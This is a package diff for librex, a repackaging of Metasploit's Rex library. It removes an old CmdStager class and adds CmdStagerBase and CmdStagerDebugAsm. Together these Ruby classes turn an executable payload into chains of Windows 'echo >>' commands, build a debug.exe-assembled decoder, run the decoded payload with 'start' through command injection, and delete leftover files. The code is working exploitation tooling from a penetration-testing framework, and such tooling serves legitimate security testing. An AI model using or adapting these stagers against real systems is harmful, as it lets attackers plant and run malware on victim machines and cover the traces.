librex 0.0.1 → 0.0.3

data/README

@@ -2,3 +2,7 @@ REX
 ===
 
 A non offical re bundling of the Rex library as a gem for easy of consuming the Metasploit REX framework in a non Metasploit application.
+
+Currently based on:
+Revision: 9625
+

data/lib/rex/exploitation/cmdstager.rb

@@ -1,133 +1,9 @@
-require 'rex/text'
-require 'rex/arch'
-require 'msf/core/framework'
-
-module Rex
-module Exploitation
-
-###
-#
-# This class provides an interface to generating cmdstagers.
-#
-###
-
-class CmdStager
-
-	def initialize(code, framework, platform, arch = nil)
-		@var_decoder = Rex::Text.rand_text_alpha(5)
-		@var_encoded = Rex::Text.rand_text_alpha(5)
-		@var_batch   = Rex::Text.rand_text_alpha(5)
-		@decoder	    =	File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "decoder_stub") # need error checking here
-		@framework   =	framework
-		@linelen     = 2047 # covers most likely cases
-
-		# XXX: TODO: support multipl architectures/platforms
-		@exe	       = Msf::Util::EXE.to_win32pe(@framework, code)
-	end
-
-
-	#
-	# Generates the cmd payload including the h2bv2 decoder and encoded payload.
-	# The resulting commands also perform cleanup, removing any left over files
-	#
-	def generate(opts = {}, linelen = 200)
-		@linelen = linelen
-
-		# Return the output from payload_exe
-		payload_exe(opts)
-	end
-
-
-	#
-	# This does the work of actually building an array of commands that
-	# when executed will create and run an executable payload.
-	#
-	def payload_exe(opts)
-
-		persist = opts[:persist]
-
-		# Initialize an arry of commands to execute
-		cmds = []
-
-		# Add the exe building commands (write to .b64)
-		cmds += encode_payload()
-
-		# Add the decoder script building commands
-		cmds += generate_decoder()
-
-		# Make it all happen
-		cmds << "cscript //nologo %TEMP%\\#{@var_decoder}.vbs"
-
-		# If we're not persisting, clean up afterwards
-		if (not persist)
-			cmds << "del %TEMP%\\#{@var_decoder}.vbs"
-			cmds << "del %TEMP%\\#{@var_encoded}.b64"
-		end
-
-		# Compress commands into as few lines as possible.
-		new_cmds = []
-		line = ''
-		cmds.each { |cmd|
-			# If this command will fit...
-			if ((line.length + cmd.length + 4) < @linelen)
-				line << " & " if line.length > 0
-				line << cmd
-			else
-				# It won't fit.. If we don't have something error out
-				if (line.length < 1)
-					raise RuntimeError, 'Line fit problem -- file a bug'
-				end
-				# If it won't fit even after emptying the current line, error out..
-				if (cmd.length > @linelen)
-					raise RuntimeError, 'Line too long - %d bytes' % cmd.length
-				end
-				new_cmds << line
-				line = ''
-				line << cmd
-			end
-		}
-		new_cmds << line if (line.length > 0)
-
-		# Return the final array.
-		new_cmds
-	end
-
-
-	def generate_decoder()
-		# Read the decoder data file
-		f = File.new(@decoder, "rb")
-		decoder = f.read(f.stat.size)
-		f.close
-
-		# Replace variables
-		decoder.gsub!(/decode_stub/, "%TEMP%\\#{@var_decoder}.vbs")
-		decoder.gsub!(/ENCODED/, "%TEMP%\\#{@var_encoded}.b64")
-		decoder.gsub!(/DECODED/, "%TEMP%\\#{@var_batch}.exe")
-
-		# Split it apart by the lines
-		decoder.split("\n")
-	end
-
-
-	def encode_payload()
-		tmp = Rex::Text.encode_base64(@exe)
-		orig = tmp.dup
-
-		cmds = []
-		l_start = "echo "
-		l_end   = ">>%TEMP%\\#{@var_encoded}.b64"
-		xtra_len = l_start.length + @var_encoded.length + l_end.length + 1
-		while (tmp.length > 0)
-			cmd = ''
-			cmd << l_start
-			cmd << tmp.slice!(0, (@linelen - xtra_len))
-			cmd << l_end
-			cmds << cmd
-		end
-
-		cmds
-	end
-
-end
-end
-end
+##
+# $Id: cmdstager.rb 9375 2010-05-26 22:39:56Z jduck $
+##
+
+require 'rex/exploitation/cmdstager/base'
+require 'rex/exploitation/cmdstager/vbs'
+require 'rex/exploitation/cmdstager/debug_write'
+require 'rex/exploitation/cmdstager/debug_asm'
+require 'rex/exploitation/cmdstager/tftp'

data/lib/rex/exploitation/cmdstager/base.rb

@@ -0,0 +1,170 @@
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating cmdstagers.
+#
+###
+
+class CmdStagerBase
+
+	def initialize(exe)
+		@linemax     = 2047 # covers most likely cases
+		@exe         = exe
+	end
+
+	#
+	# Generates the cmd payload including the h2bv2 decoder and encoded payload.
+	# The resulting commands also perform cleanup, removing any left over files
+	#
+	def generate(opts = {})
+		# Allow temporary directory override
+		@tempdir = opts[:temp]
+		@tempdir ||= "%TEMP%\\"
+		if (@tempdir == '.')
+			@tempdir = ''
+		end
+
+		opts[:linemax] ||= @linemax
+
+		generate_cmds(opts)
+	end
+
+
+	#
+	# This does the work of actually building an array of commands that
+	# when executed will create and run an executable payload.
+	#
+	def generate_cmds(opts)
+
+		# Initialize an arry of commands to execute
+		cmds = []
+
+		# Add the exe building commands
+		cmds += generate_cmds_payload(opts)
+
+		# Add the decoder script building commands
+		cmds += generate_cmds_decoder(opts)
+
+		compress_commands(cmds, opts)
+	end
+
+
+	#
+	# Generate the commands to create an encoded version of the
+	# payload file
+	#
+	def generate_cmds_payload(opts)
+
+		# First encode the payload
+		encoded = encode_payload(opts)
+
+		# Now split it up into usable pieces
+		parts = slice_up_payload(encoded, opts)
+
+		# Turn each part into a valid command
+		parts_to_commands(parts, opts)
+	end
+
+	#
+	# This method is intended to be override by the child class
+	#
+	def encode_payload(opts)
+		# Defaults to nothing
+		""
+	end
+
+	#
+	# We take a string of data and turn it into an array of parts.
+	#
+	# We save opts[:extra] bytes out of every opts[:linemax] for the parts
+	# appended and prepended to the resulting elements.
+	#
+	def slice_up_payload(encoded, opts)
+		tmp = encoded.dup
+
+		parts = []
+		xtra_len = opts[:extra]
+		xtra_len ||= 0
+		while (tmp.length > 0)
+			parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
+		end
+
+		parts
+	end
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it -- example "echo " and " >>file"
+	#
+	def parts_to_commands(parts, opts)
+		# Return as-is
+		parts
+	end
+
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+		# Defaults to no commands.
+		[]
+	end
+
+
+
+	#
+	# Compress commands into as few lines as possible. Minimizes the number of
+	# commands to execute while maximizing the number of commands per execution.
+	#
+	def compress_commands(cmds, opts)
+		new_cmds = []
+		line = ''
+		concat = cmd_concat_operator
+		cmds.each { |cmd|
+
+			# If this command will fit, concat it and move on.
+			if ((line.length + cmd.length + concat.length) < opts[:linemax])
+				line << concat if line.length > 0
+				line << cmd
+				next
+			end
+
+			# The command wont fit concat'd to this line, if we have something,
+			# we have to add it to the array now.
+			if (line.length > 0)
+				new_cmds << line
+				line = ''
+			end
+
+			# If it won't fit even after emptying the current line, error out..
+			if (cmd.length > opts[:linemax])
+				raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
+			end
+
+			# It will indeed fit by itself, lets add it.
+			line << cmd
+
+		}
+		new_cmds << line if (line.length > 0)
+
+		# Return the final array.
+		new_cmds
+	end
+
+	#
+	# Can be overriden.  For exmaple, use for unix use ";" instead
+	#
+	def cmd_concat_operator
+		""
+	end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/debug_asm.rb

@@ -0,0 +1,142 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to assemble a small COM file. The COM will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: debug.exe
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerDebugAsm < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_decoder_asm  = Rex::Text.rand_text_alpha(8) + ".dat"
+		@var_decoder_com  = Rex::Text.rand_text_alpha(8) + ".com"
+		@var_payload_in   = Rex::Text.rand_text_alpha(8) + ".dat"
+		@var_payload_out  = Rex::Text.rand_text_alpha(8) + ".exe"
+		@decoder          = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_payload_in}"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple hex encoding...
+	#
+	def encode_payload(opts)
+		ret = @exe.unpack('H*')[0]
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
+		decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
+		# NOTE: these two filenames MUST 8+3 chars long.
+		decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
+		decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Convert the debug script to an executable...
+		cvt_cmd = ''
+		if (@tempdir != '')
+			cvt_cmd << "cd %TEMP% && "
+		end
+		cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
+		cmds << cvt_cmd
+
+		# Convert the encoded payload...
+		cmds << "#{@tempdir}#{@var_decoder_com}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir}#{@var_payload_out}"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_decoder_asm}"
+			cmds << "del #{@tempdir}#{@var_decoder_com}"
+			cmds << "del #{@tempdir}#{@var_payload_in}"
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end